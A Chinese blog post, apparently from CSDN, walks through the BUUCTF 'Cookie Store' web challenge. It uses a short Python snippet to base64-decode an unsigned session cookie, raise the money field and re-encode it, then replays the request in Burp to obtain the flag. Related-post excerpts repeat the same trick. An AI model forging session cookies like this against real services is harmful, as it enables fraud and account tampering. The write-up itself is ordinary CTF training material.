BUUCTF WEB COOKIE STORE

最新推荐文章于 2024-07-25 10:08:48 发布
最新推荐文章于 2024-07-25 10:08:48 发布
阅读量153 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/124747498
版权

emmmm…自从buuctf变为K8S管理以后,靶场就出现了各种非预期解,这题就是典型了吧
我第一遍刷的时候这题还涉及到反序列化,现在属于是纯粹的一个base64编码,改cookie题了
ok,废话少说,打开场景,发现买flag的逻辑,抓包,发现买三种产品的cookie不同,cookie里的session像是base64编码
解码,发现直接是money和history。。。。。。。。。。。。我直接改了不成嘛
补一个这题原先的考点,pickle反序列化和__reduce__魔法方法(更正一下,我好像和pickle store记乱了,这题就是纯改cookie)
reduce方法是定义了pickle模块反序列化的规则,当pickle反序列化特定对象时会调用方法,构造对象的时候重写reduce方法可达到rce的效果
现在直接把反序列化给省了?what the fuck?
那就直接改cookie就行了
import base64
#原先的cookie,我之前已经改过了
print(base64.b64decode(“eyJtb25leSI6IDQ5OTAwLCAiaGlzdG9yeSI6IFsiWXVtbXkgZmxhZyBjb29raWUiLCAiZmxhZ3tlMjQwMTFlZi00MjFjLTRkZGQtYTJhYS04YzlmOWNjNjM2ZDB9XG4iXX0=”))
session=b’{“money”: 50000, “history”: [“Yummy flag cookie”]}’
print(base64.b64encode(session))
结果:eyJtb25leSI6IDUwMDAwLCAiaGlzdG9yeSI6IFsiWXVtbXkgZmxhZyBjb29raWUiXX0=
用burp抓包,改session,回显里有flag
参考视频链接:https://www.bilibili.com/video/bv1s541197it

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webcookie采集监控工具
05-26
【标题】:“Webcookie采集监控工具”是一种专门用于捕获和分析网络cookies的软件工具,它可以帮助用户深入了解网站如何在浏览器中存储和使用cookies。在网络安全和数据分析领域,这类工具具有重要的应用价值。 ...
JavaScript学习教程之cookiewebstorage
10-16
JavaScript中的CookieWeb Storage是两种常见的数据存储机制,它们用于在客户端和服务器之间持久化数据,以解决HTTP无状态协议的问题。本文将详细介绍这两种技术及其使用。 首先,Cookie是最早被广泛使用的客户端...
buuctf-Cookie Store
m0_62094846的博客
05-18 145
题目提示cookie,抓包后在cookie后看到有点特别的东西,试一下base64 (花了一块,本来应该是50的)把49改成100,然后加密填回去 再购买flag就可以了
[WP/BUU/CTF]Cookie Store 题解
車鈊的博客
07-31 448
简单题,涉及Cookie的使用方法 存储-Cookie-session-值 base64解码 eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ== // 解码 {"money": 50, "history": []} 后台通过base64存储用户信息,是及其危险的,可以伪造数据 {"money": 100, "history": []} // 编码 eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0= 替换Value,刷新,购买flag即可 ..
BugkuCTF:cookies欺骗(web
s0il的博客
04-03 2590
题目描述: 点开链接,给了一串字符,这里只是一部分: rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaiheg Burp抓包,发现没什么效果: 思路 但,包里面的 GET /web11/ind...
[watevrCTF-2019]Cookie Store
shinygod的博客
04-08 197
知识点:session伪造+base64编码 我们抓包会发现 session会是一个base64编码,解密后 eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ== {"money": 50, "history": []} 而我们买第一个的时候,id会显0,买第二个的时候,id会显示1,那不难猜出第三个flag的id为2 所以我们只要构造 {"money": 100, "history": []} 然后base64加密一下就可以了。 eyJtb25leSI6IDEwMC
BUUCTF之[watevrCTF-2019]Cookie Store
weixin_44632787的博客
07-30 346
BUUCTF之[watevrCTF-2019]Cookie Store 打开挑战页面发现它说你初始基金是50,但是购买flag需要100 然后参考源码和访问robots.txt都没有发现什么重要的信息,所以就用BurpSuite抓包试试看… 一开始是以为在id里面试试注入的,但是随便输入一些信息都没有看到什么可疑的,但是后来注意到cookie那里有个很像base64的加密,所以解密试试看有什么东西 结果发现!!! 所以payload: eyJtb25leSI6IDEwMCwgImhpc3Rvcnki
web技术之cookie讲解
08-31
Web开发中,Cookie是一种非常重要的技术,它用于在客户端和服务器之间存储和传递信息。本文将深入探讨Cookie的基本概念、工作原理、用途以及在Java中的实现。 首先,Cookie是由服务器端发送到用户浏览器并存储在...
Web实现登录界面,cookie,php文件打包
05-25
这个压缩包文件"Web实现登录界面,cookie,php文件打包"显然包含了一个完整的登录系统实现,涉及到了前端界面、Cookie以及PHP后端处理。下面将详细阐述这些知识点。 1. **Web登录界面**:登录界面通常由HTML、CSS和...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在PHP 5.3.0之前,如果`register_globals`配置选项设为`ON`,那么HTTP请求中的变量(如GET、POST、COOKIE等)会被自动转换为全局变量。攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。自...
2020/7/27 - [watevrCTF-2019]Cookie Store - 伪造cookie
抒情诗
07-27 1074
一开始还以为这是一个很难的题目,没想到就是一个简单的COOkIe伪造。 1.伪造cookie 根据他的题目提示,这可能是一道伪造cookie的题,所以先用burpsuIte进行抓包。 买这个一块钱的先试一下,结果: 很明显看到了我们剩余的钱数是50,改成500,再把post的数据id=0改为id=2用来买我们的3号商品flag。 2.获得flag forward之后有如下内容: 很明显session是一个base64,直接解码后获得flag ...
【浏览器】CookieWebStorage
南栀的博客
03-10 527
文章目录CookieWebStorage本地存储sessionStoragelocalStoragesessionStorage和localStorage对比 浏览器的缓存机制提供了可以将用户数据存储在客户端上的方式,可以利用cookie,session等跟服务端进行数据交互。 Cookie HTTP Cookie简称cookie,在HTTP请求发送Set-Cookie HTTP头作为响应的一部分。通过name=value的形式存储。 cookie的构成: 名称:name(不区分大小写,但最好认为它是
ctf-攻防世界-webcookie
一只菜鸟的博客
11-01 4095
提示在cookie里放了东西,那么就去查看cookie吧。F12打开开发者工具,在储存里有名为look-here,值为cookie.php的cookie 访问cookie.php,提示See the http response,即查看http返回包。 在开发者工具的网络一栏查看cookie.php,即可发现flag 或者用burp抓包,右键send to repeater 可查看返回包的headers发现flag ...
cookiewebStorage的区别
qq_51231294的博客
11-12 451
cookie: 存储容量最大不能超过4kb; 安全性较低,每次请求cookie都会被携带到服务器端,且以明文方式存储,一旦被拦截,信息则会被获取 webStorage分为sessionStorage和localStorage sessionStorage
“微软蓝屏”事件暴露网络安全哪些问题
sheji888的专栏
07-23 375
微软蓝屏”事件是指2024年7月19日发生的一起全球性技术故障,主要涉及微软视窗(Windows)操作系统及其相关应用和服务。
微软蓝屏事件:网络安全的多维挑战与应对策略
sinner小屋
07-23 728
微软蓝屏事件,这一近期震动全球科技界的重大事件,起因于一次看似平常的软件更新。美国电脑安全技术公司“众击”发布的更新包中隐藏着一个致命的“缺陷”,这个缺陷如同潜伏的病毒,一旦被激活,便在全球范围内引发了连锁反应。近850万台设备,从个人电脑到关键行业的服务器,无一幸免地遭遇了系统崩溃,屏幕上只剩下一片冰冷的蓝色。这一事件不仅影响了日常办公,更是波及了航空、医疗、传媒等关键领域,造成了航班延误、医疗服务中断、信息传播受阻等一系列严重后果。
网络安全之初始访问阶段攻防手段(三)
最新发布
子非渔
07-25 794
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
【网络安全】CrowdStrike 的 Falcon Sensor 软件导致 Linux 内核崩溃
par@ish的博客
07-22 1155
CrowdStrike的Falcon Sensor软件,上周导致大量Windows电脑出现蓝屏故障,现在还被发现Linux内核系统崩溃也与CrowdStrike有关。六月份,Red Hat警告其客户在使用版本为5.14.0-427.13.1.el9_4.x86_64的内核启动后,由Falcon Sensor进程引发的“Kernel panic”问题,影响了部分Red Hat Enterprise Linux 9.4用户。
webcookie伪造
10-14
Web Cookie 伪造是指攻击者通过伪造 Cookie 的值来冒充合法用户,从而获取用户的权限或者窃取用户的信息。攻击者可以通过多种方式伪造 Cookie,比如 XSS 攻击、Session Fixation 攻击等。 为了防止 Web Cookie 伪造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值